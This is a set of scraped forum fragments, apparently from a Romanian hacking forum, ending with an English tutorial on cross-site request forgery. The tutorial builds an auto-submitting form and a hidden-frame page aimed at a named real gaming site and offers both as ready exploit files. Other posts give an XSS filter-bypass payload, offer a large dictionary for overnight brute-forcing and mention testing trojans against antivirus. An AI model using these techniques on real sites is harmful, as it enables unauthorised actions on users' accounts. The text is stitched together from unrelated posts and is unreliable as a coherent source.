moubik

o sa testez sa vad daca trece de bitdefender si nod32 acasa

auzi sharingad, amprenta vrea un challenge de la tine edit: ahh, o metoda pe care am folosit-o a fost sa modific pagina o data ce a fost incarcata (cu webdeveloper plugin) si am transformat din input type="text" in textarea care iti permite sa faci paste pe mai multe linii, si astfel unui shell daca doresti . si submit.

da

dada, ai dreptate nu exita ceva care bate tot, glumeam varianta cu vm mi se pare cea mai buna pentru ca din linux oricum nu vad rostul sa folosesc interfata. asa ca-l folosesc ca server apache + php + mysql +postgres + orice script mai am chef sa rulez pe el. da, si perl bineinteles este preferinta proprie. daca vreau sa rulez si niste programe de windows si de linux pot in acelasi timp, pot sa fac teste cu troieni daca doresc, pentru ca am si inca un windows cu antivirus diferit. mai am si un windows 2003 server pe care mai rulez scripturi asp.

recomand netcat peste telnet. in rest totul este la fel.

windows + masini virtuale bate tot

:mrgreen:

salut andrei. aici de obicei oamenii spun cateva cuvinte despre sine. nu e obligatoriu totusi

eu zic sa nu-ti bati capul ca nu are rost. pot sa-ti dau un dictionar maricel, de vreo 7mil de cuvinte, care contine si cuvinte in romana si sa-ti lasi calculatorul peste noapte sa faca bruteforce, poate prinde ceva.

la wifi nu merge pentru ca e altceva acolo de exemplu pt wifi in linux nu mai ai utilitarul ifconfig, unul dintre cele care se poate ocupa de configurarea wifi poate fi iwconfig. vezi documentatia.

programare, sau tools

da, am folosit si eu backtrack, totusi sa-ti instalezi o distributie live pe hdd nu stiu de ce ai face. miile de celelalte distributii nu te ajuta ? traiasca KNOPPIX STD!

repara-l ca vreau sa-l stric si eu

mie mi-a placut cartea lui Tudor Sorin. Poate o gasesti la librarie.

merci, am inteles. de tehnica asta nu stiam

The Frente de Libertaç

a venit amprenta, a facut codul "public" si i-a facut pe toti leet acum nu zic de tine Nabukadnezar

in loc sa faci blind xss attack, adica incerci chestii prestabilite in genul "><script>alert(1)</script> incerci chestii si incerci sa te adaptezi, sa folosesti sistemul de filtrare in avantajul tau. de exemplu pe un site se filtra <script> si </script> si atunci cand am observat am incercat: <scr<script>ipt >alert(1)</scr</script>ipt> - care evident este gresit. dar pentru ca ei filtreaza anumite cuvinte transforma acest string intr-unul valid dude, tu ai facut super tutorial de hacking si de mentalitate.. sincer chiar l-am citit cu placere.

pot sa-ti dau codul pe privat daca vrei. putem sa nu ne mai certam te rog ? chiar vreau sa intru cu placere in continuare pe forumul acesta.

multumesc, stiam de tehnica dar nu am vazut nici un poc pana acum.

m-ai invatat o lectie de viata. acum ma simt implinit. esti cumva pustan ? ca te simti important vad

grow up. vrei sa pun requirements pentru a citi acest tutorial ?

nu e explicat pt bunica ta. accepta si taci.

A simple CSRF tutorial Cross Site Request Forgery. What does it actually mean? First let's check a site out: http://sc.gosugamers.net Create an account. I've created an account named "websecurity.ro". Login and select Autologin Login and select autologin What does autologin mean ? It means that it saves the cookie and every time i'll enter that page i will be automatically logged (this is very important in CSRF) Let's see for example how i can add a friend: http://sc.gosugamers.net/friends/ Nice, i can add myself as a friend I’ve added myself as a friend Let's see how the addfriend form looks like (I'll use webdeveloper plugin from firefox): <form action="admin/friends.php" method="post"> <input name="sql" value="a_f" type="hidden" /> <input name="f_name" style="width: 150px" type="text" /> <input value="Add user to my friends list" type="submit" /> </form> from this code we can create this auto submitting html: <form action="http://sc.gosugamers.net/admin/friends.php" method="post" name="dude"> <input name="sql" value="a_f" type="hidden" /> <input name="f_name" style="width: 150px" type="text" value="websecurity.ro" /> <input value="Add user to my friends list" type="submit" /> </form> <script> setTimeout("document.dude.submit()", 2000); </script> We can save this code as gosugamers_csrf.html Anyone who is already logged in sc.gosugamers.net and enters gosugamers_csrf.html will automatically add "websecurity.ro" as their friend. PoC: gosugamers_csrf.html This is one of the most harmless CSRF that you can create on their website. I don't really like how this piece of code gets executed, because the user can see that the request has been made and can undo it immediately. Let's create another html: <html> <head></head> <frameset rows="100%,0%"> <frame src="somecoolpage.html"> <frame src="gosugamers_csrf.html" name="littleframes"> </frameset> </html> And save it as gosugamers_hidden_csrf.html This one loads 2 pages: - somecoolpage.html that will blind the user who enters the page; - gosugamers_csrf.html that will be almost invisible for the user. The final CSRF PoC: gosugamers_hidden_csrf.html original article on http://websecurity.ro http://websecurity.ro/blog/2007/11/17/csrf-cross-site-request-forgery-tutorial/